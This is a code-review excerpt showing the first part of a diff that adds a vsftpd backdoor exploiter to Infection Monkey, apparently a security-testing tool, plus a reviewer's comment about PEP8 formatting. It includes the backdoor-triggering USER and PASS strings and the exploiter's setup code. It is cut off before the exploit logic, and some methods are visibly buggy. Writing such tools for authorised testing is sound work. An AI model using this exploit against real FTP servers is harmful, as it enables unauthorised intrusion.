monkey/infection_monkey/exploit/vsftpd.py

```diff
@@ -0,0 +1,163 @@
+import StringIO
+import logging
+import paramiko
+import socket
+import time
+from common.utils.exploit_enum import ExploitType
+from infection_monkey.exploit import HostExploiter
+from infection_monkey.exploit.tools import build_monkey_commandline
+from infection_monkey.exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth
+from infection_monkey.model import MONKEY_ARG
+from infection_monkey.network.tools import check_tcp_port
+from logging import getLogger
+
+LOG = getLogger(__name__)
+
+__author__ = 'D3fa1t'
+
+FTP_PORT = 21
+TRANSFER_UPDATE_RATE = 15
+USERNAME = b'USER letmein:)\n'
+PASSWORD = b'PASS please\n'
+DOWNLOAD_TIMEOUT = 300  # copied from rdpgrinder
+
+
+class VSFTPDExploiter(HostExploiter):
+    _TARGET_OS_TYPE = ['linux']
+    
+    def __init__(self, host):
+        self._update_timestamp = 0
+        super(VSFTPDExploiter, self).__init__(host)
+        self.skip_exist = self._config.skip_exploit_if_file_exist
+
+    def socket_connect(s,ip_addr,port):
+        try:
+            s.connect((ip_addr,port))
+            return True
+        except socket.error as e:
+            LOG.error('Failed to connect to %s' , self.host.ip_addr)
+        
+        return False 
+
+    def socket_send_recv(s,message):
```

Comment:
Same here and other method calls/declarations. I'd advise you to get an IDE that detects PEP8 standard and shows you format mistakes.